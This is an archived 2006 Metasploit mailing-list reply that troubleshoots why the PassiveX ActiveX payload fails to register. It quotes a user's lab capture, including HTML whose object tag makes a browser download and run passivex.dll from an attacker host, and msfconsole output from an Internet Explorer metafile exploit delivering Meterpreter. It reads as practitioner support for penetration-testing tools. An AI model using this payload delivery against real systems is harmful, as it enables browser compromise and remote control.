Metasploit mailing list archives
Using the PassiveX payload
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 5 May 2006 10:00:27 -0500
On Fri, May 05, 2006 at 11:11:43AM +0200, Feature Meister wrote:
Hi, it seems as if the control does not get registered. At least there's nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under HKEY_CLASSES_ROOT. The account I am trying it with has administrative privileges.
<snip>
3rd response: HTTP/1.1 200 OK Connection: close Content-type: text/html <html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838" codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1";><param name="HttpHost" value="192.168.71.75"><param name="HttpPort" value="8000"><param name="DownloadSecondStage" value="1"></object></html> ============================================================ 4th request (C -> 192.168.71.75:8000): GET /passivex.dll HTTP/1.1
<snip>
on MSFConsole I see: msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit [*] Starting PassiveX Handler on 192.168.71.75:8000. [*] Waiting for connections to http://192.168.71.75:80/ [*] HTTP Client connected from 192.168.71.71:1078, redirecting... [*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes of payload... [*] Sending PassiveX main page to client... [*] Sending PassiveX DLL in HTTP response (106496 bytes)...
This looks like the correct series of events to me. The next thing to check is whether or not the passivex.dll is in the downloaded program files folder (%WINDIR%\Downloaded Program Files). You'll need to browse there from a cmd, not from explorer. If it's there, try to run the following command: "regsvr32 passivex.dll" If the command succeeds, check in the registry again under HKEY_CLASSES_ROOT for the class name. If it doesn't, note the error and send it back over to us. As far as I know, PassiveX has no non-standard DLL dependencies, so it should register without issue. If the file is not there (be sure to check in CONFLICT.x folders too just in case), then something is going on that is causing it not to download properly.
Current thread:
- Using the PassiveX payload Feature Meister (May 04)
- Using the PassiveX payload mmiller at hick.org (May 04)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 04)